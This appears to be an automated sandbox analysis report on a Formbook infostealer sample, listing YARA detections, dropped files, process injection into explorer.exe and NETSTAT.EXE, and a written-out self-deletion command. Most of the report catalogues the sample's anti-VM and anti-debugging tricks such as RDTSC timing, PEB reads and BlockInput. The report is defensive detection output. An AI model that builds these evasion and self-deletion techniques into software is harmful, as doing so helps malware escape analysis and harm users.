Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_00F35778
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EF8B30 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EE1A36 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EF0D17 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EF9FA5 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00EE1CB6 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: String function: 00F01B70 appears 39 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A360 NtCreateFile, 2_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A410 NtReadFile, 2_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A490 NtClose, 2_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A540 NtAllocateVirtualMemory, 2_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A35B NtCreateFile, 2_2_0041A35B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A40A NtReadFile, 2_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041A48B NtClose, 2_2_0041A48B
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F342D5: CreateFileW,DeviceIoControl,CloseHandle, 1_2_00F342D5
Sample file is different than original file name gathered from version info
Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs shedfam.exe
Source: shedfam.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/5@3/2
Source: C:\Users\user\Desktop\shedfam.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3A6AD GetLastError,FormatMessageW, 1_2_00F3A6AD
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 1_2_00F3443D
Source: C:\Users\user\Desktop\shedfam.exe File read: C:\Users\user\Desktop\shedfam.exe Jump to behavior
Source: C:\Users\user\Desktop\shedfam.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\shedfam.exe C:\Users\user\Desktop\shedfam.exe
Source: C:\Users\user\Desktop\shedfam.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\shedfam.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe" Jump to behavior
Source: C:\Users\user\Desktop\shedfam.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F28DE9 AdjustTokenPrivileges,CloseHandle, 1_2_00F28DE9
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_00F29399
Source: C:\Users\user\Desktop\shedfam.exe File created: C:\Users\user\AppData\Local\Temp\nse13E8.tmp Jump to behavior
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 1_2_00F34148
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF8B75 push ecx; ret 1_2_00EF8B88
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041693E push ebp; ret 2_2_0041693F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0040D308 push FFFFFF90h; iretd 2_2_0040D30D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D56C push eax; ret 2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D502 push eax; ret 2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D50B push eax; ret 2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EF8B75 push ecx; ret 2_2_00EF8B88
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress, 1_2_00F4C6D9
Drops PE files
Source: C:\Users\user\Desktop\shedfam.exe File created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE7
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_00F559B3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00EE5EDA
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00EE5EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00EF33B7
Source: C:\Users\user\Desktop\shedfam.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002F19904 second address: 0000000002F1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002F19B7E second address: 0000000002F19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6016 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5356 Thread sleep time: -32000s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe API coverage: 1.4 %
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\shedfam.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000003.00000000.266277554.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.261007312.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00EE5D13
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F34005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3C2FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00F3494A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00F3CD9F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD14 FindFirstFileW,FindClose, 1_2_00F3CD14
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F5D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F735
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3FA36
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F33CE2
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress, 1_2_00F4C6D9
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0149 mov eax, dword ptr fs:[00000030h] 1_2_03AF0149
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0005 mov eax, dword ptr fs:[00000030h] 1_2_03AF0005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0019 mov eax, dword ptr fs:[00000030h] 1_2_03AF0019
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF007A mov eax, dword ptr fs:[00000030h] 1_2_03AF007A
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00EE5240
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00F05CAC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_00F288CD
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0040ACF0 LdrLoadDll, 2_2_0040ACF0
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F445D5 BlockInput, 1_2_00F445D5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00EFA385
